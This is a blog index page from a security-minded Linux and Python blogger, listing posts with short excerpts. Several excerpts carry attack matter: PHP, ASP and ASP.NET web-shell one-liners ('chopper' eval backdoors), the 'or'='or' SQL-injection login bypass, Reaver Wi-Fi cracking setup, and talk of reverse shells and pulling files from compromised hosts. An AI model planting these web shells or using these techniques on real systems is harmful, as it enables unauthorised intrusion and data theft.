- 博客(177)
- 资源 (8)
- 收藏
- 关注
RSS订阅原创 【做减法】Linux工具快速教程 - 基础篇
1. 命令帮助在只记得部分命令关键字的场合,我们可通过man -k来搜索;需要知道某个命令的简要说明,可以使用whatis;而更详细的介绍,则可用info命令;查看命令在哪个位置,我们需要使用which;而对于命令的具体参数及使用方法,我们需要用到强大的man2. 文件及目录管理2.1 创建和删除创建:mkdir删除:rm删除非空目录:rm -rf file目录删除日志 rm *l
2016-07-20 10:54:53
1569
翻译 新 HTTP 状态码
起因是同学发起的一个请求被乌云返回了 520 ,遂查一下新增的 HTTP 状态码CloudFlareCloudFlare's reverse proxy service expands the 5xx error space to signal issues with the origin server.520 Unknown ErrorThe 520 error is used as a "cat
2016-06-04 14:01:38
29953
原创 腾讯 2016 春招笔试(伪)权威解析
这篇文章的原文在:原文地址1、应用程序开发过程中,下面哪些开发习惯可能导致安全漏洞?在程序代码中打印日志输出敏感信息方便测试(√)在使用数组前判断是否越界在生成随机数前使用当前时间设置随机数种子(√)设置配置文件权限为rw-rw-rw-(√)只说一下第三个吧,给出篇文章随机数是骗人的 这篇文章中提到的另一篇文章我也给出链接,省去大家查找的时间当随机不够随机:一个在线扑克游戏...
2016-06-04 09:47:41
11073
1
原创 服务器架构演变之路学习
一直对网站从无到有、从小到大的后端架构支持的演变过程感兴趣,最近梳理了一番整个过程,在将来如果自己也要对网站架构进行优化的时候也知道方向第一种演变过程最基础架构 –> 进阶 替换 Apache 为 Nginx,并在数据库前加上 cache 层 –> 进阶 CGI 无法匹配上 Nginx 的高 IO 性能,这时候可以通过写扩展来替代脚本程序来提升性能,用 C / Lua 写扩展是个好办法
2016-05-31 12:53:35
1045
原创 Detux 沙盒搭建
Detux 介绍Limon 沙盒由于不是双机环境,被我搁置了,先解决 Detux 沙盒的问题 Detux 沙盒的 GitHub 地址和在线沙盒环境都给出了,如果想自己搭建也可以,作者在 GitHub 上指出其特别感谢 aurel,这个人构建了不同处理器的各种环境的虚拟机,供大家下载的地址问题出现下载完成后可以看到,都是qcow2格式的,或许这位同仁实现的就是在线的那个版本,上传的样本被传进后台新启
2016-05-31 12:50:15
2312
1
原创 也说同步异步阻塞非阻塞
这里所说的概念都是指 API 和 网络 I/O 方面的,如果是其他科目同一词汇可能表达的是完全不同的概念,比如布式系统里的同步表示是各节点按照时钟节拍同步,而异步是收到消息后立即执行同步就是调用方一直等着被调方完成 异步就是调用方不必等着被调方完成,完成后被调方通知调用方 阻塞就是调用方一直等着消息 非阻塞就是调用方不必一直等待消息,可以先去干别的举个例子,就用在饭店点菜做例子 同步阻塞就是
2016-05-31 12:48:39
650
原创 用 maptail 构建简易攻击地图
maptail 描述的资料没有一个讲在 Debian 下安装的,我看的都是使用 Cent OS 进行搭建,其实是基于 Nodejs,然后调用 WEB 服务器访问日志实时打印出访问信息,那么我们可以在 Debian 上很轻松的配置一套,不过首先要安装 Node.js 和 npm, npm 依赖 Node.js 先安装它apt-get updateapt-get install git-core cu
2016-05-31 12:46:54
1863
原创 Flask Web 开发学习稿(三)
第六章 电子邮件当我们需要在特定事件发生时提醒用户,包装了 smtplib 的 Flask-Mail 扩展能更好的和 Flask 集成 安装 pip install flask-mail Flask-Mail 连接到 SMTP 服务器,如果不进行配置,Flask-Mail 会连接 localhost 上的端口 25 配置 默认值 说明 MAIL_SERVER localhost
2016-05-31 12:42:53
5694
原创 Flask Web 开发学习稿(二)
第四章 Web 表单request.from 能获取 POST 请求中提交的表单数据 Flask-WTF 扩展可以把处理 Web 表单的过程变成一种愉悦的体验4.1 跨站请求伪造保护默认情况下,Flask-WTF 能保护所有表单免受跨站请求伪造的攻击,为了实现 CSRF 保护,Flask-WTF 需要程序设置一个密钥,会使用这个密钥生成加密令牌,再用令牌验证请求中表单数据的真伪 设置密钥的方法如
2016-05-31 12:41:36
7336
1
原创 Flask Web 开发学习稿(一)
好久没有更新过了,把这些日子搞的东西先放一波出来 这个学习笔记未必会包含全部章节,有时会将两个章节进行合并第一章 安装1.1 使用虚拟环境虚拟环境是 Python 解释器的一个私有副本,可以安装私有包而不影响全局 Python 解释器 Python 3.3 通过 venv 模块原生支持虚拟环境,命令为 pyvenv 。不过在 Python 3.3 中使用 pyvenv 命令创建的虚拟环境不包含
2016-05-31 12:38:47
15642
1
原创 Web应用安全权威指南读书思维导图
拜读完了德丸浩的《Web应用安全权威指南》,果然如序中所写,“德丸本”名不虚传 由于有些图片过大,不得不进行压缩后再上传难免失真,如果难以看清可以联系我获取PDF版本
2016-04-06 14:45:36
2768
1
原创 Shodan的利用
Shodan 注册后在用户中心会有一个API Key,利用这个 Key 可以使用 shodan 的命令行版本,首先下载这个项目 git clone https://github.com/achillean/shodan-python.git 然后安装python setup.py buildpython setup.py install安装完成后要使用API Key 对 Shodan 进行初始
2016-04-05 13:02:56
16061
原创 Python 练手程序合集(三)
六、协同过滤Slope One是一个可以用于推荐系统的算法,在只有很少的数据时候也能得到一个相对准确的推荐,而且算法很简单, 易于实现, 执行效率高,由此衍生的还有加权 Slope One 算法、双极 SlopeOne 算法(BI-Polar SlopeOne)将用户对于其的厌恶程度也引入打分机制中,下面简单解释一下 Slope One 算法的原理: 用户 东西一 东西二 张三 5
2016-02-01 13:11:20
3860
原创 Python 练手程序合集(二)
三、猴子吃桃猴子第一天摘下若干个桃子,当即吃了一半,还不过瘾就多吃了一个。第二天早上又将剩下的桃子吃了一半,还是不过瘾又吃了一个。以后每天都吃前一天剩下的一半再加一个。到第10天刚好剩一个。问猴子第一天摘了多少个桃子? 递归版本# encoding: utf-8def peach(day, number): if day == 10: return number r
2016-01-29 12:29:06
3021
原创 Python 练手程序合集(一)
一、百钱百鸡 公鸡5文钱一只,母鸡3文钱一只,小鸡3只一文钱,用100文钱买一百只鸡,其中公鸡,母鸡,小鸡都必须要有,问公鸡,母鸡,小鸡要买多少只刚好凑足100文钱。# encoding: utf-8x = 1y = 1while x <= 20: while y <= 33: z = 100 - (x + y) if (z % 3 == 0) and (
2016-01-28 16:28:37
25772
3
原创 “复制”Linux系统
如果你装好的服务器需要批量“复制”安装,手动安装会不会累死人,我们应该选一个更为轻松的方案 以下方案仅讨论Linux系统(Windows系统下有Ghost和Sysprep两种方法,个人推荐在图方便的情况下使用Ghost,如果想让每台的SID号不同就不能使用Ghost而要使用Sysprep才可以1、DockerDocker几乎可以运行在任何Linux系统(64位)上,像Ubuntu的新版本都是自带D
2016-01-26 15:44:44
7524
原创 Python爬虫学习稿(三)
一、数据结构 我们必须知道,一个网页上存在许多链接,并且如果已经爬取过的页面是不需要再重复进行爬取的,那么爬虫就需要判断,①这个页面是否曾经被爬取过②页面上的这些链接爬取的顺序解决问题一: Python自从2.3后提供了一种名为集合(set)的数据结构,和数学上的集合一样,支持交、并、差等运算,set是一种无序且不包含重复元素的数据结构 所以我们可以把爬取过的URL扔进集合中,然后对目前的UR
2016-01-12 23:45:07
848
原创 Kali 2.0 使用 Reaver 的注意事项
1、刚一开始使用这条命令 airmon-ng start wlan0 就可以开始了,需要注意的是,在Kali 2.0里开启的不再是mon0了,而是wlan0mon,所以不要和 Kali 1.X 的版本代码混淆2、Kali 1.X 的命令无效在Kali 2.0 中必须自己手动开启网卡的监听模式,所以在执行完上面之后,需要自己手动开启监听模式ifconfig wlan0mon downiwconfig
2016-01-12 21:51:46
10842
原创 Python 爬虫学习稿(二)
一、对上篇的补充 urlopen返回的对象提供了如下方法: read() , readline() ,readlines() , fileno() , close()这些的使用方式与文件对象完全一样 info():返回一个httplib.HTTPMessage对象,表示远程服务器返回的头信息 getcode():返回Http状态码。如果是http请求,200请求成功完成;404网址未找到
2016-01-11 00:41:24
715
原创 Python 爬虫学习稿(一)
本次学习的环境是基于Python 3.3.5,实验的工具是Pycharm 5.0.1 基础的知识我就不再介绍,比如HTTP的基础知识、爬虫的相关背景 直接开始爬虫的学习吧!一、用Python抓取指定页面常见的urllib2库在Python3.X的版本中改名啦!叫urllib.request了! urlopen()可以接收三个参数即urlopen(url, data, timeout) url
2016-01-10 00:52:52
1475
转载 最短的各类一句话
转自:http://zone.wooyun.org/content/23474 菜刀readme.txt中附带一3个一句话: PHP: <?php @eval($_POST['chopper']);?> ASP: <%eval request("chopper")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.I
2015-11-07 07:53:36
1863
原创 Kali 相关辑录一
1.Kali 2.0 连接数据库首先判断数据库是否启动 service postgresql status 启动数据库 /etc/init.d/postgresql start设置数据库开机启动 update-rc.d postgresql enable查看端口使用情况 netstat -tln 默认监听是5432端口 查看msf是否成功连接数据库 msf > db_stat
2015-10-17 18:24:58
848
原创 那些我希望在一开始使用命令行就知道的事儿
还是要起这么一个俗套的题目,但是确实是我在一开始就想知道的事情 Linux下命令行有一种神器的魔力,用了就离不开······1.任务管理器在Windows中的任务管理器还在用Ctrl+Alt+Delete 这都是XP时代留下的恶习,在 Win8 和 Win 10中没有发现这个按键唤出一个页面的功能并不单一吗? 页面切换出去会打断你的思路,你只要唤出任务管理器而已,为什么不使用Ctrl+Shift
2015-09-07 11:26:18
659
原创 Ubuntu 15.04折腾手记(4)
1.CMake使用cmake --version 来查看当前系统的CMake版本 如果没有安装CMake可以使用apt-get install cmake 若要安装最新版本的CMake就必须前往官网下载源码进行安装 CMake官网 可以在列表里找到你要下载的特定版本或者最新版本的CMake 截止我写的时候,CMake最新版本是3.3.0 所以我找到下载地址为:http://www.cma
2015-09-07 10:24:48
576
原创 Ubuntu 15.04 折腾手记(3)
1. PuttyPutty 使用密钥连接Ubuntu 15.04 首先在Ubuntu 端产生公钥和私钥ssh-keygen -t rsa产生的两个密钥在用户目录下的.ssh目录下,一个是id_rsa.pub另(私钥)一个是id_rsa(公钥),其中把私钥改名成SSH可识别的名字 mv .ssh/id_rsa.pub .ssh/authorized_keys然后给这个文件赋予权限 chmod 6
2015-08-13 16:31:53
833
原创 Ubuntu 15.04 折腾手记(2)
1. WineWine 是一款让你在 Linux、MAC 上运行 Windows 程序的软件 截至我写的时候,Wine最新版本是1.7.48 beta版 安装命令:sudo add-apt-repository ppa:ubuntu-wine/ppasudo apt-get updatesudo apt-get install wine1.7 winetricks卸载命令:sudo apt-
2015-08-04 07:38:23
735
原创 中国开源镜像站
由于“The Great Wall”的关系,好多源地址要么特别慢,要么干脆访问不了,国内有好多镜像站,我摘录我常见的十个镜像站1、网易开源镜像站:http://mirrors.163.com/2、阿里云开源镜像站: http://mirrors.aliyun.com/3、中国科学技术大学:http://mirrors.ustc.edu.cn/4、清华大学:http://mirrors.tuna.ts
2015-08-01 10:41:49
991
原创 Ubuntu 15.04 折腾手记
1.Variety这是一个自动更换壁纸的软件sudo add-apt-repository ppa:peterlevi/ppasudo apt-get updatesudo apt-get install variety订阅二次元图,在设置中添加如下链接 http://www.reddit.com/r/animewallpaper2.Unity Tweak Tool这是一个修改系统默认主题、风
2015-07-31 20:09:01
674
原创 Python Security 之 反向Shell
首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTP
2015-07-14 19:44:36
1281
原创 Python Security 之 端口扫描
这一章将会演示如何通过Python的网络连接来开发一个基础的端口扫描器 我们的设计思路是使用socket一遍又一遍的去连接ip与端口的组合的新值下面的代码就演示了如何使用内建的socket模块去建立一个socket连接import sockets = socket.socket()s.connect(('127.0.0.1s', 22))s.send('Primal Security \n')
2015-07-14 19:28:40
831
原创 Python Security 入门
这篇文章假定你的系统是Linux,python版本是2.*。你可以使用内置的help()函数去了解一个函数的详细。记住这一点,它可以帮助你在学习语言的时候学习到更多的详细内容. 如help(type)有时你会想把一些变量和字符串连接起来然后通过脚本显示出来。那么你就需要使用str()函数把整型转换成字符串类型ip = '1.1.1.1'port = 55print 'the ip is
2015-07-13 22:03:03
1680
原创 Linux和Windows堆栈溢出利用对比
堆栈溢出的利用,有三大条件,一是返回点的定位,二是ShellCode的编写,三是跳转到ShellCode。1.返回点的定位在Windows下,F.ZH的在它经典的《菜鸟版Exploit编写指南之一》的文章中,详细的讲述了利用报错对话框精确定位溢出返回点的方法。 Windows下弹出报错对话框,显示“0x74737271”指令引用“0x74737271”内存,该地址不能为“read”。里面隐含的意思
2015-07-13 14:17:41
1925
原创 Metasploit 整理笔记
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
2015-07-12 14:31:58
14250
1
原创 Metasploit 学习笔记
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql startservice metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enableupdate-rc.d me
2015-07-11 23:11:05
21622
原创 Visual Studio 2013 MFC 编程
一、创建MFC项目创建MFC项目时,高级功能一般默认即可,但如果用不上“ActiveX 控件”可以去掉勾选;如果需要涉及网络编程就把 “Windows 套接字” 选上。 不过没选上也不要紧, 在程序中可以自己添加部分代码导入套接字。二、整体架构学会看资源视图和类视图来快速寻找某些需要的东西 比如通过类视图可以快速访问类的头文件和源文件,双击类名打开头文件,点击下方的函数可直接跳转到对应的函数定义处
2015-07-05 10:40:27
13531
2
原创 《Visual Studio 程序员箴言》读书笔记
技巧1.1 在空白行上按Ctrl+C不会丢失剪贴板的内容 工具→选项→文本编辑器→所有语言→常规→没有选定内容时对空行应用剪切或复制命令 技巧1.2 循环使用剪贴板 Ctrl+Shift+V 技巧1.3 插入空行 使用Ctrl+Enter在上方插入一行,使用Ctrl+Shift+Enter在下方插入一行 技巧1.4 选择当前
2015-07-04 12:39:57
714
原创 万能密码原理和总结
我们所常说的’or’=’or’万能密码的原理是这样的: SQL语句sql=”select * from user where username=’”&username&”‘and pass=’”& pass&’” ,当我们用户名和密码都填写’or’=’or’提交的时候,即此时语句中的username和pass都等于’or’=’or’,那么,这条SQL语句就变成了:sql=”select * fro
2015-07-04 10:57:35
20810
网页编辑器漏洞大全
2015-07-13
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人